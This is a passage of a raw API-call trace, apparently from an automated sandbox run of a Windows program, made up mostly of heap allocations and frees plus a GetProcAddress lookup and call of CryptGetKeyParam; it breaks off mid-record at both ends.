(HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0103.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0103.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0103.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0103.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0103.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0103.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0103.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0103.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0103.280] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0103.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0103.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0103.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0103.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2b10 [0103.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0103.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0103.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0103.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0103.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7d8 [0103.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0103.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0103.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0103.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0103.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0103.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0103.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0103.280] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0103.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0103.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0103.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0103.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0103.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0103.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0103.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0103.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0103.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0103.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0103.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0103.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0103.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0103.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0103.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0103.281] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0103.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0103.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0103.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0103.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0103.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0103.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0103.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0103.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0103.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0103.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0103.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0103.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0103.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0103.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0103.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0103.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0103.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0103.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0103.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0103.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0103.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0103.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0103.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0103.282] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0103.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0103.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0103.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0103.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0103.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0103.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0103.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0103.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0103.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0103.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0103.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0103.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391dc8 [0103.282] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0103.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0103.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0103.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7f0 [0103.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0103.282] PeekMessageW (in: lpMsg=0x144db3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144db3c) returned 0 [0103.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0103.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0103.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0103.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0103.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0103.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0103.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0103.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0103.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0103.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0103.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0103.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0103.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0103.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0103.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0103.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0103.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0103.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0103.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0103.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0103.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0103.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0103.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0103.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0103.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0103.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0103.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0103.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0103.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0103.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0103.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0103.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0103.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0103.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0103.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0103.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0103.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0103.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0103.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0103.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0103.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0103.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0103.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0103.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0103.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0103.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0103.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0103.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0103.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0103.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0103.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0103.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797088 [0103.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0103.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0103.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0103.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0103.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0103.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0103.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0103.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0103.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0103.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0103.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0103.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0103.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0103.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0103.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0103.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0103.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0103.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0103.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0103.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0103.285] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0103.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0103.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0103.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0103.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0103.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0103.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0103.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0103.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0103.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0103.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0103.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0103.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0103.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0103.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0103.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0103.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0103.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0103.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0103.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0103.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0103.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0103.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0103.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0103.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0103.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0103.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0103.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0103.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0103.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0103.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0103.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0103.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0103.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0103.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0103.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0103.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0103.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0103.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0103.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0103.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0103.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0103.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0103.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0103.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0103.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0103.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0103.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0103.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0103.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0103.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0103.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796de8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0103.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0103.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0103.287] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0103.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0103.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0103.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0103.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0103.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0103.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0103.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0103.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0103.287] CryptGetKeyParam (in: hKey=0x41ac700, dwParam=0x7, pbData=0x43e2af0, pdwDataLen=0x144db58, dwFlags=0x0 | out: pbData=0x43e2af0*=0x6610, pdwDataLen=0x144db58*=0x4) returned 1 [0103.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0103.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0103.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0103.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0103.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0103.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0103.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0103.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0103.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0103.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0103.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0103.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0103.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0103.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0103.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0103.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0103.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b90 | out: hHeap=0x1780000) returned 1 [0103.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0103.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0103.288] HeapFree (in: 